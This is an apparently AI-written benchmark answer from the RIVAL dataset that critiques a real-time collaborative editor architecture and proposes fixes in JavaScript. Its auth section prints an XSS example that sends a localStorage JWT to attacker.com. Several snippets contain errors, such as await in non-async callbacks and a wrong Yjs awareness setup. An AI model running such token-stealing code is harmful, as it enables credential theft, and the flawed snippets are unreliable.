4 models have responded to the "Debug This Architecture" challenge. Compare their approaches side-by-side on RIVAL. This response is part of RIVAL's open dataset of 5,600+ AI model responses.
Claude Haiku 4 5's response to the 'Debug This Architecture' challenge.
Here's the architecture for a real-time collaborative document editor (like Google Docs): **System Overview:** - Frontend: React SPA with WebSocket connections - Backend: Node.js API servers behind a load balancer (round-robin) - Database: PostgreSQL for document storage, Redis for session cache - Real-time: Each API server maintains its own WebSocket connections to clients - Sync Strategy: Last-write-wins with timestamps from client clocks - Storage: Documents saved as full HTML snapshots every 30 seconds - Auth: JWT tokens with 24-hour expiry, stored in localStorage - CDN: CloudFront for static assets, also caches API responses for 5 minutes **Data Flow:** 1. User types → change event sent via WebSocket to their connected server 2. Server writes change to PostgreSQL 3. Server broadcasts change to all WebSocket clients connected to THAT server 4. Other servers poll PostgreSQL every 2 seconds for changes 5. Conflict resolution: if two users edit the same paragraph, last timestamp wins **Scaling Plan:** - Horizontal scaling by adding more API servers - Database read replicas for read-heavy operations - Document partitioning by organization ID Identify all potential failure modes, race conditions, and scaling bottlenecks in this architecture. For each issue found, propose a specific solution with trade-offs.
Problem: Clients connected to different servers can't see each other's changes in real-time.
Race Condition Example:
T0: User1 (Server A) edits para[0] = "Hello"
T1: User2 (Server B) edits para[0] = "Hi"
T2: Server A writes to DB, broadcasts to its clients
T3: Server B polls, reads User1's change, overwrites with User2's change
T4: Server B broadcasts to User2
Result: Inconsistent state between servers
Solutions:
| Solution | Trade-offs |
|---|---|
| Redis Pub/Sub for inter-server messaging | +Real-time sync across servers, -Adds Redis complexity, -Message ordering guarantees needed |
| Use WebSocket gateway (e.g., Socket.io with Redis adapter) | +Battle-tested, -Architectural change, -Added latency layer |
| Event sourcing + distributed log (Kafka) | +Audit trail, +Exactly-once semantics, -Operational complexity, -Overkill for simple edits |
Recommended: Redis Pub/Sub with message versioning:
// Server A receives edit
async function handleEdit(userId, docId, change, timestamp) {
const version = await db.incrementDocVersion(docId);
// Broadcast to local clients
broadcastToLocalClients(docId, { ...change, version, timestamp });
// Broadcast to all servers via Redis
await redis.publish(`doc:${docId}`, JSON.stringify({
type: 'edit',
change,
version,
timestamp,
serverId: process.env.SERVER_ID
}));
// Write to DB
await db.saveChange(docId, change, version, timestamp);
}
// All servers listen
redis.subscribe(`doc:*`);
redis.on('message', (channel, message) => {
const { docId } = parseChannel(channel);
const { serverId, version } = JSON.parse(message);
// Ignore if from own server (already broadcast)
if (serverId === process.env.SERVER_ID) return;
// Broadcast to local clients with version info
broadcastToLocalClients(docId, JSON.parse(message));
});
Problem: "Last-write-wins with timestamps from client clocks" is fundamentally broken.
Concrete Failure:
Real timeline:
T0 (10:00:00): User B clicks and starts typing "Hello"
T5 (10:00:05): User A clicks and types "Hi" (but A's clock says 10:00:00)
T6 (10:00:06): User B finishes typing
Server receives:
- Edit from A: timestamp=10:00:00, content="Hi"
- Edit from B: timestamp=10:00:06, content="Hello"
LWW resolution: A's edit wins (earlier timestamp)
Reality: B edited first, but loses
Solutions:
| Solution | Trade-offs |
|---|---|
| Server-assigned timestamps | +Eliminates clock skew, -Requires round-trip for every keystroke, -Increases latency |
| Hybrid: Client timestamp + server sequence number | +Tolerates clock skew, +Low latency, -Slightly more complex conflict resolution |
| Operational Transformation (OT) | +Handles concurrent edits correctly, -Complex implementation, -Difficult to debug |
| CRDT (Conflict-free RDT) | +Mathematically sound, +Works offline, -Higher memory usage, -Larger message sizes |
Recommended: Hybrid approach with server sequence numbers:
// Client sends timestamp, server assigns sequence
async function saveChange(docId, change, clientTimestamp) {
const serverSequence = await db.getNextSequence(docId);
const serverTimestamp = Date.now();
const changeRecord = {
docId,
change,
clientTimestamp, // For audit/debugging only
serverTimestamp, // For ordering
serverSequence, // Tiebreaker
userId,
version
};
// Conflict resolution uses: (serverSequence, userId) not timestamps
await db.saveChange(changeRecord);
return { serverSequence, serverTimestamp };
}
// Conflict resolution
function resolveConflict(edit1, edit2) {
// Use server sequence as source of truth
if (edit1.serverSequence > edit2.serverSequence) return edit1;
if (edit2.serverSequence > edit1.serverSequence) return edit2;
// Tiebreaker: lexicographic on userId (deterministic)
return edit1.userId < edit2.userId ? edit1 : edit2;
}
Problem: When two users edit overlapping content, one user's work is silently deleted.
Example:
Initial: "The quick brown fox"
User A (para 0-19): Replaces with "The fast brown fox"
User B (para 4-9): Replaces with "The slow brown fox"
With LWW on timestamp:
- If B's edit has later timestamp, result: "The slow brown fox"
- User A's "fast" is lost permanently
- No conflict warning shown to either user
Why it matters: Unacceptable in production. Users lose work without knowing.
Solutions:
| Solution | Trade-offs |
|---|---|
| Show conflict UI to users | +Explicit, -Interrupts flow, -Requires UX design |
| CRDT (Automerge/Yjs) | +Automatic sensible merges, +Offline support, -Significant rewrite |
| Operational Transform | +Proven (Google Docs), +Merges non-overlapping edits, -Complex, steep learning curve |
| Locking mechanism | +Prevents conflicts, -Reduces concurrency, -Degrades to pessimistic locking |
Recommended: CRDT with Yjs (minimal rewrite):
// Replace full-snapshot storage with CRDT
import * as Y from 'yjs';
class DocumentManager {
constructor(docId) {
this.ydoc = new Y.Doc();
this.ytext = this.ydoc.getText('shared');
}
// Load from DB
async load(docId) {
const updates = await db.getYjsUpdates(docId);
updates.forEach(u => Y.applyUpdate(this.ydoc, Buffer.from(u)));
}
// Local edit
applyLocalChange(index, length, text) {
this.ytext.delete(index, length);
this.ytext.insert(index, text);
// Serialize and broadcast
const update = Y.encodeStateAsUpdate(this.ydoc);
return update;
}
// Remote edit
applyRemoteUpdate(update) {
Y.applyUpdate(this.ydoc, update);
// Yjs automatically merges non-overlapping edits
// Overlapping edits use deterministic CRDT rules
}
// Periodic persistence
async saveUpdate(update) {
await db.saveYjsUpdate(docId, update);
}
}
Problem: Cross-server synchronization via polling is fundamentally unscalable.
Math:
Bottleneck:
-- This query runs 50,000 times/second
SELECT * FROM changes
WHERE doc_id = ?
AND created_at > ?
ORDER BY created_at;
Solutions:
| Solution | Trade-offs |
|---|---|
| Replace polling with Redis Pub/Sub | +O(1) message delivery, -Requires architectural change, -Redis becomes SPOF |
| Increase poll interval to 10s | +Reduces load, -Increases latency to 10s, -Unacceptable UX |
| Use database triggers + NOTIFY (PostgreSQL) | +Native, -Requires pg_listen client, -Adds complexity |
| Event streaming (Kafka) | +Scalable, +Audit trail, -Operational overhead |
Recommended: Redis Pub/Sub (already in stack):
// Replace polling entirely
class SyncManager {
constructor() {
this.pubClient = redis.createClient();
this.subClient = redis.createClient();
}
async subscribeToDocument(docId) {
// Subscribe once per document per server
await this.subClient.subscribe(`changes:${docId}`);
this.subClient.on('message', (channel, message) => {
const change = JSON.parse(message);
this.broadcastToConnectedClients(docId, change);
});
}
async publishChange(docId, change) {
// Instant delivery to all servers
await this.pubClient.publish(`changes:${docId}`,
JSON.stringify(change)
);
}
}
// Remove polling code entirely
// Delete: setInterval(() => pollForChanges(), 2000);
Problem: User's edits between snapshots can be lost on server crash.
Scenario:
T0: Snapshot saved (user has typed "Hello")
T15: User types " World" (not yet in snapshot)
T20: Server crashes
T25: Server restarts, loads last snapshot
Result: " World" is lost
Risk Calculation:
Solutions:
| Solution | Trade-offs |
|---|---|
| Write-ahead log (WAL) for every change | +No data loss, -Disk I/O overhead, -Slower writes |
| Reduce snapshot interval to 5s | +Less data loss window, -6x more snapshots, -DB load increases |
| Event sourcing: store changes, not snapshots | +Perfect audit trail, -Requires replay on load, -Slower cold starts |
| Redis persistence (AOF) | +Fast, +Durable, -Adds Redis complexity |
Recommended: Event sourcing with periodic snapshots:
// Store individual changes, not snapshots
async function saveChange(docId, change, version) {
await db.query(
`INSERT INTO changes (doc_id, change_data, version, created_at)
VALUES ($1, $2, $3, NOW())`,
[docId, JSON.stringify(change), version]
);
// Create snapshot every 100 changes
const changeCount = await db.query(
`SELECT COUNT(*) FROM changes WHERE doc_id = $1`,
[docId]
);
if (changeCount.rows[0].count % 100 === 0) {
await createSnapshot(docId);
}
}
// Load document efficiently
async function loadDocument(docId) {
// Get latest snapshot
const snapshot = await db.query(
`SELECT content, version FROM snapshots
WHERE doc_id = $1
ORDER BY version DESC LIMIT 1`,
[docId]
);
// Replay changes since snapshot
const changes = await db.query(
`SELECT change_data, version FROM changes
WHERE doc_id = $1 AND version > $2
ORDER BY version`,
[docId, snapshot.rows[0]?.version || 0]
);
// Reconstruct document
let doc = snapshot.rows[0]?.content || {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: Multiple authorization vulnerabilities.
Issue 1: localStorage is XSS-vulnerable
// Attacker injects script via malicious document content
<script>
fetch('https://attacker.com?token=' + localStorage.getItem('jwt'));
</script>
Issue 2: 5-minute API cache with stale auth
T0: User logs in, gets JWT (valid)
T1: Admin revokes user's access in database
T2: User makes request (still cached, bypasses auth check)
T3: Request succeeds with revoked permissions
Issue 3: 24-hour token expiry is too long
Solutions:
| Solution | Trade-offs |
|---|---|
| httpOnly cookies + CSRF tokens | +Immune to XSS for token theft, -Requires CSRF protection, -Slightly more complex |
| Short-lived tokens (15 min) + refresh tokens | +Reduces window of compromise, -More refresh requests, -Requires refresh token storage |
| Remove API caching for auth-required endpoints | +Always enforces current permissions, -Increases load, -Reduces performance |
| Token revocation list (Redis) | +Instant revocation, -Redis lookup per request, -Cache invalidation complexity |
Recommended: httpOnly cookies + short-lived tokens + Redis revocation:
// Auth middleware
async function authMiddleware(req, res, next) {
const token = req.cookies.jwt; // httpOnly cookie
if (!token) return res.status(401).json({ error: 'Unauthorized' });
try {
const decoded = jwt.verify(token, SECRET, {
algorithms: ['HS256'],
issuer: 'https://yourdomain.com',
audience: 'api'
});
// Check revocation list
const isRevoked = await redis.get(`revoked:${decoded.jti}`);
if (isRevoked) {
return res.status(401).json({ error: 'Token revoked' });
}
req.user = decoded;
next();
} catch (err) {
return res.status(401).json({ error: 'Invalid token' });
}
}
// Login endpoint
app.post('/login', async (req, res) => {
const user = await authenticateUser(req.body);
const token = jwt.sign(
{
sub: user.id,
jti: crypto.randomUUID() // Unique token ID for revocation
},
SECRET,
{
expiresIn: '15m', // Short expiry
issuer: 'https://yourdomain.com',
audience: 'api'
}
);
const refreshToken = jwt.sign(
{ sub: user.id },
REFRESH_SECRET,
{ expiresIn: '7d' }
);
res.cookie('jwt', token, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.cookie('refreshToken', refreshToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 7 * 24 * 60 * 60 * 1000
});
res.json({ success: true });
});
// Logout endpoint
app.post('/logout', async (req, res) => {
const token = req.cookies.jwt;
const decoded = jwt.decode(token);
// Revoke token immediately
await redis.setex(`revoked:${decoded.jti}`, 15 * 60, '1');
res.clearCookie('jwt');
res.clearCookie('refreshToken');
res.json({ success: true });
});
// Refresh token endpoint
app.post('/refresh', (req, res) => {
const refreshToken = req.cookies.refreshToken;
try {
const decoded = jwt.verify(refreshToken, REFRESH_SECRET);
const newToken = jwt.sign(
{ sub: decoded.sub, jti: crypto.randomUUID() },
SECRET,
{ expiresIn: '15m' }
);
res.cookie('jwt', newToken, {
httpOnly: true,
secure: true,
sameSite: 'strict',
maxAge: 15 * 60 * 1000
});
res.json({ success: true });
} catch (err) {
res.status(401).json({ error: 'Invalid refresh token' });
}
});
Problem: Caching API responses breaks real-time collaboration.
Scenario:
T0: User A requests document state → Server returns "Hello"
T1: User B edits document to "Hello World"
T2: User A refreshes page within 5 minutes
T3: CloudFront returns cached "Hello" (stale data)
T4: User A continues editing from stale state
T5: Conflict when both edits merge
Solutions:
| Solution | Trade-offs |
|---|---|
| Remove API caching entirely (Cache-Control: no-cache) | +Always fresh, -Increases origin load, -Slower for read-heavy workloads |
| Separate CDN for static assets only | +Caches CSS/JS, -Doesn't cache API, -More complex routing |
| Cache API by document version | +Can cache longer, -Invalidation complexity, -Requires version headers |
| Use Cache-Control: private, max-age=0 | +Browser still caches, -CDN doesn't cache, -Minimal benefit |
Recommended: Separate CDN tiers:
// Static assets (cacheable)
app.use(express.static('public', {
setHeaders: (res, path) => {
if (path.endsWith('.js') || path.endsWith('.css')) {
res.setHeader('Cache-Control', 'public, max-age=31536000, immutable');
// Include hash in filename for cache busting
}
}
}));
// API endpoints (not cacheable)
app.get('/api/documents/:docId', (req, res) => {
res.setHeader('Cache-Control', 'no-cache, no-store, must-revalidate');
res.setHeader('Pragma', 'no-cache');
res.setHeader('Expires', '0');
// Return document
});
// CloudFront configuration
// - Whitelist only static asset paths for caching
// - API paths bypass cache entirely
// - Use separate behaviors for different path patterns
Problem: Current LWW is too naive for real-time collaboration.
Document: "abcdef"
User A: Delete "c" (index 2) → "abdef"
User B: Insert "X" at index 3 → "abcXdef"
What should happen?
- If A deletes first: "abXdef" (B's insertion shifts)
- If B inserts first: "abdXef" (A deletes from new position)
LWW just picks one completely, losing the other edit
Solutions:
| Solution | Trade-offs |
|---|---|
| Implement OT (Operational Transform) | +Battle-tested (Google Docs), +Handles overlapping edits, -Complex (200+ LOC minimum), -Difficult to debug |
| Use CRDT library (Yjs/Automerge) | +Automatic merging, +Offline support, +Simpler than OT, -Larger message sizes, -Memory overhead |
| Pessimistic locking | +Prevents conflicts, -Reduces concurrency, -Poor UX (users wait for locks) |
Recommended: Yjs (already mentioned in #3, but critical enough to restate):
// With Yjs, this just works
const ydoc = new Y.Doc();
const ytext = ydoc.getText('content');
// User A
ytext.delete(2, 1); // Delete "c"
// User B (concurrent)
ytext.insert(3, 'X'); // Insert "X"
// Result: "abXdef" (deterministic, both edits preserved)
Problem: Users don't know who else is editing or where.
Risks:
Solutions:
| Solution | Trade-offs |
|---|---|
| Cursor presence via WebSocket | +Real-time, +Low latency, -Requires tracking per connection |
| Activity log in sidebar | +Shows recent edits, -Not real-time, -Requires polling |
| Collaborative cursors library | +Battle-tested, +Integrates with CRDT, -Adds dependencies |
Recommended: Yjs with y-protocols for awareness:
import * as Y from 'yjs';
import * as awarenessProtocol from 'y-protocols/awareness';
const ydoc = new Y.Doc();
const awareness = ydoc.awareness;
// Broadcast local state
awareness.setLocalState({
user: {
name: currentUser.name,
color: currentUser.color,
clientID: ydoc.clientID
},
cursor: {
anchor: 0,
head: 5
}
});
// Listen for remote changes
awareness.on('change', changes => {
changes.forEach(clientID => {
const state = awareness.getStates().get(clientID);
if (state) {
renderRemoteCursor(clientID, state.cursor);
}
});
});
Problem: Users lose connection → edits are lost.
Solutions:
| Solution | Trade-offs |
|---|---|
| Local storage queue + retry | +Simple, -Manual sync logic, -Data loss on browser crash |
| Service Worker + IndexedDB | +Works offline, +Syncs on reconnect, -Browser storage limits, -Complexity |
| CRDT with local persistence | +Automatic sync, +Works offline, +Yjs has built-in support, -Larger payload |
Recommended: Yjs with IndexedDB persistence:
import * as Y from 'yjs';
import { IndexeddbPersistence } from 'y-indexeddb';
const ydoc = new Y.Doc();
const persistence = new IndexeddbPersistence('document-id', ydoc);
persistence.whenSynced.then(() => {
console.log('Loaded from IndexedDB');
});
// Works offline: edits stored in IndexedDB
ytext.insert(0, 'offline edit');
// On reconnect: automatically syncs via WebSocket
Problem: User reconnects → routed to different server → loses WebSocket state.
Scenario:
Request 1: User A → Load Balancer → Server 1 (WebSocket connected)
Request 2: User A → Load Balancer → Server 2 (no WebSocket state)
Result: User A's edits don't broadcast to their own clients
Solutions:
| Solution | Trade-offs |
|---|---|
| Sticky sessions (IP hash or cookie) | +Keeps user on same server, -Uneven load distribution, -Server failures lose connections |
| Shared session store (Redis) | +Load balancer can distribute freely, +Server failures don't lose state, -Redis lookup per request |
| WebSocket gateway (e.g., Socket.io) | +Handles reconnection, +Automatic load balancing, -Additional latency |
Recommended: Sticky sessions + Redis fallback:
// Nginx config
upstream api_servers {
ip_hash; // Route based on client IP
server api1.internal:3000;
server api2.internal:3000;
server api3.internal:3000;
}
// Node.js: Store WebSocket metadata in Redis
const wsClients = new Map(); // Local cache
io.on('connection', (socket) => {
const userId = socket.handshake.auth.userId;
const serverId = process.env.SERVER_ID;
// Track locally
wsClients.set(userId, socket);
// Also store in Redis for failover
await redis.setex(
`ws:${userId}`,
3600,
JSON.stringify({ serverId, socketId: socket.id })
);
socket.on('disconnect', () => {
wsClients.delete(userId);
await redis.del(`ws:${userId}`);
});
});
// Broadcast to user (works across servers)
async function broadcastToUser(userId, message) {
// Try local first
const localSocket = wsClients.get(userId);
if (localSocket) {
localSocket.emit('update', message);
return;
}
// Check Redis for user's server
const wsInfo = await redis.get(`ws:${userId}`);
if (wsInfo) {
const { serverId } = JSON.parse(wsInfo);
// Publish to that server's Redis channel
await redis.publish(`user:${userId}:${serverId}`, JSON.stringify(message));
}
}
Problem: Malicious user can spam edits → DoS.
Attacker: Send 1000 edits/second
Result: Database overloaded, all users experience lag
Solutions:
| Solution | Trade-offs |
|---|---|
| Token bucket per user | +Fair, +Configurable, -Requires tracking per user |
| Redis rate limiter | +Fast, +Distributed, -Redis lookup per request |
| Adaptive rate limiting | +Responds to load, -More complex |
Recommended: Redis token bucket:
async function checkRateLimit(userId, docId) {
const key = `ratelimit:${userId}:${docId}`;
const limit = 100; // 100 edits per minute
const window = 60;
const current = await redis.incr(key);
if (current === 1) {
await redis.expire(key, window);
}
if (current > limit) {
throw new Error('Rate limit exceeded');
}
}
// Use in edit handler
io.on('connection', (socket) => {
socket.on('edit', async (data) => {
try {
await checkRateLimit(socket.userId, data.docId);
await handleEdit(data);
} catch (err) {
socket.emit('error', { message: 'Rate limit exceeded' });
}
});
});
Problem: Can't answer "who changed what when" or recover from mistakes.
Solutions:
| Solution | Trade-offs |
|---|---|
| Store all changes in audit table | +Complete history, +Can restore any version, -Storage overhead |
| Event sourcing | +Audit trail is primary source, +Can replay, -Architectural change |
| Immutable log (Kafka) | +Durable, +Scalable, -Operational complexity |
Recommended: Audit table (simple):
async function saveChange(docId, change, userId) {
const changeId = crypto.randomUUID();
await db.query(
`INSERT INTO document_changes
(id, doc_id, user_id, change_data, created_at)
VALUES ($1, $2, $3, $4, NOW())`,
[changeId, docId, userId, JSON.stringify(change)]
);
return changeId;
}
// Query audit trail
async function getHistory(docId, limit = 100) {
return db.query(
`SELECT id, user_id, change_data, created_at
FROM document_changes
WHERE doc_id = $1
ORDER BY created_at DESC
LIMIT $2`,
[docId, limit]
);
}
// Restore to specific point
async function restoreToVersion(docId, changeId) {
const changes = await db.query(
`SELECT change_data FROM document_changes
WHERE doc_id = $1 AND created_at <=
(SELECT created_at FROM document_changes WHERE id = $2)
ORDER BY created_at`,
[docId, changeId]
);
let doc = {};
changes.rows.forEach(row => {
doc = applyChange(doc, JSON.parse(row.change_data));
});
return doc;
}
Problem: What if two users rename the same document simultaneously?
Solutions:
Problem: User reads stale data from replica.
Solutions:
Problem: Database corruption → all documents lost.
Solutions:
| Issue | Severity | Root Cause | Recommended Fix | Effort |
|---|---|---|---|---|
| Split-brain sync | CRITICAL | No inter-server messaging | Redis Pub/Sub | Medium |
| Client clock skew | CRITICAL | Client-side timestamps | Server sequence numbers | Low |
| LWW data loss | CRITICAL | Naive conflict resolution | CRDT (Yjs) | High |
| Polling scalability | CRITICAL | 50k QPS polling | Redis Pub/Sub | Medium |
| Snapshot data loss | CRITICAL | 30s window | Event sourcing | Medium |
| Auth bypass | CRITICAL | localStorage + cache | httpOnly + short-lived tokens | Medium |
| API caching | CRITICAL | CloudFront on dynamic data | Separate static/API CDN | Low |
| No OT/CRDT | MAJOR | Naive conflict resolution | Yjs library | High |
| No offline support | MAJOR | Missing persistence | IndexedDB + Yjs | Medium |
| Sticky sessions | MAJOR | Round-robin LB | IP hash + Redis | Low |
| No rate limiting | MAJOR | Missing limits | Redis token bucket | Low |
| No audit trail | MAJOR | Missing logging | Audit table | Low |
The architecture needs a complete overhaul of the sync/conflict resolution layer. Start with Redis Pub/Sub + Yjs CRDT, then address auth and persistence.
Turn this model response into notes, narration, or a short video
Partner link